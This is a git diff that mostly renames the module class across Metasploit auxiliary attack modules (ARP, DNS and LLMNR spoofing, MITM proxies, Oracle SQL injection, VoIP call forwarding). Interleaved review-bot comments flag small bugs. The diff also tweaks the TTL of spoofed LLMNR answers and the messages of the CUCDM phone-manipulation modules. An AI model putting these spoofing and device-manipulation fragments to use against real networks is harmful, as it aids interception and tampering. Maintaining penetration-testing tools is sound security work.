@@ -15,7 +15,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML @@ -310,7 +310,7 @@ class Metasploit3 < Msf::Auxiliary else print_status("Auth successful, saving server response in database") end - vprint_status(resp) + vprint_status(resp.to_s) end return [resp, ser_sock] end diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 18ef1934ae..0033a03077 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb index 7d8e18556b..86ec17abe3 100644 --- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb +++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ms15_134_mcl_leak.rb b/modules/auxiliary/server/ms15_134_mcl_leak.rb index 1b97e2d2ea..896e05a6be 100644 --- a/modules/auxiliary/server/ms15_134_mcl_leak.rb +++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb index b30cb8c6b8..e197916a7e 100644 
--- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb +++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index f316d4100d..3146aff0db 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/pxeexploit.rb b/modules/auxiliary/server/pxeexploit.rb index a2a7815f82..b635394bf1 100644 --- a/modules/auxiliary/server/pxeexploit.rb +++ b/modules/auxiliary/server/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 1695eeb3e2..aec82408ff 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -7,7 +7,7 @@ require 'thread' require 'msf/core' require 'rex/proto/proxy/socks4a' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 547253c0b9..5e7d1e6e57 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index 92466df2ee..491e9802d3 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'tmpdir' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/auxiliary/server/tnftp_savefile.rb index 26e4894234..2c1222705a 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/auxiliary/server/tnftp_savefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index c46d0dc197..c955636e3d 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wget_symlink_file_write.rb b/modules/auxiliary/server/wget_symlink_file_write.rb index 7c1393b655..b8e9ce41e8 100644 --- a/modules/auxiliary/server/wget_symlink_file_write.rb +++ b/modules/auxiliary/server/wget_symlink_file_write.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/server/wpad.rb b/modules/auxiliary/server/wpad.rb index 087e30c9d5..0b99424ff1 100644 --- a/modules/auxiliary/server/wpad.rb +++ b/modules/auxiliary/server/wpad.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index d2551d6e13..8dc5e2f964 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index e60bac50ee..aacfb39fd4 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary raise RuntimeError ,'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] - @sip ||= Pcap.lookupaddrs(@interface)[0] if @netifaces + @sip ||= get_ipv4_addr(@interface)[0] if @netifaces raise "LOCALSIP is not defined and can not be guessed" unless @sip raise "LOCALSIP is not an ipv4 address" unless Rex::Socket.is_ipv4?(@sip) diff --git a/modules/auxiliary/spoof/cisco/cdp.rb b/modules/auxiliary/spoof/cisco/cdp.rb index b320ad39ab..12b1118e85 100644 --- a/modules/auxiliary/spoof/cisco/cdp.rb +++ b/modules/auxiliary/spoof/cisco/cdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture def initialize 
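Review bot: In arp_poisoning.rb (`@@ -79,7 +79,7 @@`), the `[0]` carried over from `Pcap.lookupaddrs(@interface)[0]` looks wrong on the new `get_ipv4_addr(@interface)[0]`. If `get_ipv4_addr` returns the address itself as a String (its definition is not part of this diff chunk), the index keeps only the first character, and the `Rex::Socket.is_ipv4?(@sip)` check two lines below would then raise "LOCALSIP is not an ipv4 address" whenever LOCALSIP is left unset. If that is the helper's contract, the line should read `@sip ||= get_ipv4_addr(@interface) if @netifaces`. The enclosing method starts and ends outside the hunk.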
diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 99635b7b88..a9ab5ea1ac 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 252269ec00..4960895c92 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index e6b76e176e..b15069e1ae 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -9,7 +9,7 @@ require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 6b881e849e..f4292229b1 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/spoof/llmnr/llmnr_response.rb b/modules/auxiliary/spoof/llmnr/llmnr_response.rb index b94cb212c8..5b604415fb 100644 --- a/modules/auxiliary/spoof/llmnr/llmnr_response.rb +++ b/modules/auxiliary/spoof/llmnr/llmnr_response.rb 
@@ -8,7 +8,7 @@ require 'socket' require 'ipaddr' require 'net/dns' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture @@ -44,7 +44,7 @@ attr_accessor :sock, :thread register_options([ OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", ""]), OptRegexp.new('REGEX', [ true, "Regex applied to the LLMNR Name to determine if spoofed reply is sent", '.*']), - OptInt.new('TTL', [ false, "Time To Live for the spoofed response", 300]), + OptInt.new('TTL', [ false, "Time To Live for the spoofed response", 30]), ]) deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER') @@ -85,7 +85,7 @@ attr_accessor :sock, :thread when ::Net::DNS::A dns_pkt.answer << ::Net::DNS::RR::A.new( :name => name, - :ttl => 30, + :ttl => datastore['TTL'], :cls => ::Net::DNS::IN, :type => ::Net::DNS::A, :address => spoof.to_s @@ -93,7 +93,7 @@ attr_accessor :sock, :thread when ::Net::DNS::AAAA dns_pkt.answer << ::Net::DNS::RR::AAAA.new( :name => name, - :ttl => 30, + :ttl => datastore['TTL'], :cls => ::Net::DNS::IN, :type => ::Net::DNS::AAAA, :address => (spoof.ipv6? ? spoof : spoof.ipv4_mapped).to_s diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 56be4ad3f2..887dfb492b 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index c2a8526b1b..74b97e94da 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture 
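Review bot: In llmnr_response.rb, the A and AAAA answer hunks (`@@ -85,7 +85,7 @@` and `@@ -93,7 +93,7 @@`) now pass `datastore['TTL']` straight into the resource record, while the option in `@@ -44,7 +44,7 @@` is still registered as not required (`[ false, ... ]`). An operator who unsets TTL would therefore hand nil to `::Net::DNS::RR::A.new` and `::Net::DNS::RR::AAAA.new`; how the constructor treats that is not visible here. Either mark the option required, `OptInt.new('TTL', [ true, "Time To Live for the spoofed response", 30]),`, or fall back at both use sites with `:ttl => datastore['TTL'] || 30,`. The method building the answers starts and ends outside these hunks.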
diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 321e6274cf..9c91ad82f0 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 94a89cafaa..044e891078 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index ec27e9811d..550371ede9 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 7b91469936..ac55375e17 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index c0022ed351..1d19d2c094 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index f4fb58a5de..1ce9b91f56 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index d7d10f96fc..f702167af9 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index d37f8afa39..3d7d30f039 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index e6a178033c..19000fa3e5 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE 
diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index e26375ae12..e2e0520df4 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index e3df57ecb9..b6384a70ea 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 4ecfd3accb..a01efd8bc6 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 878c2b01d6..aa36759b4c 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 0ae6f375c2..163d335998 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 93d6a71e4b..701050daf0 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index fac34e6d92..18c8f676f8 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index d97591d2da..50afc10cc0 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/voip/asterisk_login.rb b/modules/auxiliary/voip/asterisk_login.rb index a05995214d..51022dbfd7 100644 --- a/modules/auxiliary/voip/asterisk_login.rb +++ b/modules/auxiliary/voip/asterisk_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index b3de7313ce..6f35f80783 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb 
+++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary uri = normalize_uri(target_uri.to_s) mac = datastore["MAC"] - print_status("#{peer} - Getting fintnumbers and display names of the IP phone") + print_status("Getting fintnumbers and display names of the IP phone") res = send_request_cgi( { @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/ - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") print_status("#{res}") return [] end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary end lines.size.times do |i| - print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") + print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") end fint_numbers @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary end if fint_numbers.empty? - print_error("#{peer} - FINTNUMBER required to forward calls") + print_error("FINTNUMBER required to forward calls") return end fint_numbers.each do |fintnumber| - print_status("#{peer} - Sending call forward request for #{fintnumber}") + print_status("Sending call forward request for #{fintnumber}") send_request_cgi( { @@ -138,9 +138,9 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.body && res.body && res.body.to_s =~ /CFA/ - print_good("#{peer} - Call forwarded successfully for #{fintnumber}") + print_good("Call forwarded successfully for #{fintnumber}") else - print_status("#{peer} - Call forward failed.") + print_status("Call forward failed.") end end end diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index ae40518cd1..2c7a8005c3 100644 
--- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/ return Exploit::CheckCode::Vulnerable, res else - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") return Exploit::CheckCode::Safe, res end end @@ -98,17 +98,17 @@ class Metasploit3 < Msf::Auxiliary info << "Name: #{names[i].split(":")[1]}, " info << "Telephone: #{phones[i]}" - print_good("#{peer} - #{info}") + print_good("#{info}") end else - print_status("#{peer} - No Speed Dial detected") + print_status("No Speed Dial detected") end end def list mac = datastore['MAC'] - print_status("#{peer} - Getting Speed Dials of the IP phone") + print_status("Getting Speed Dials of the IP phone") vars_get = { 'device' => "SEP#{mac}" } @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", 'telno' => "#{telno}", 
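Review bot: In cisco_cucdm_speed_dials.rb (`@@ -98,17 +98,17 @@`), removing the `#{peer} - ` prefix leaves `print_good("#{info}")`, an interpolation that only wraps a value the surrounding lines already build as a string with `info <<`. `print_good(info)` is the plainer form. The enclosing method starts outside the hunk, so the initial value of `info` is not visible here.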
@@ -134,11 +134,11 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body && res.body.to_s =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary mac = datastore['MAC'] position = datastore['POSITION'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -156,9 +156,9 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") + print_good("Speed Dial #{position} is deleted successfully") else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", 
@@ -178,8 +178,8 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_good("Speed Dial #{position} is deleted successfully") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", @@ -192,14 +192,14 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end end diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index 1369b7b231..d934835c9b 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 5ee141c27c..96468a23d9 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb 
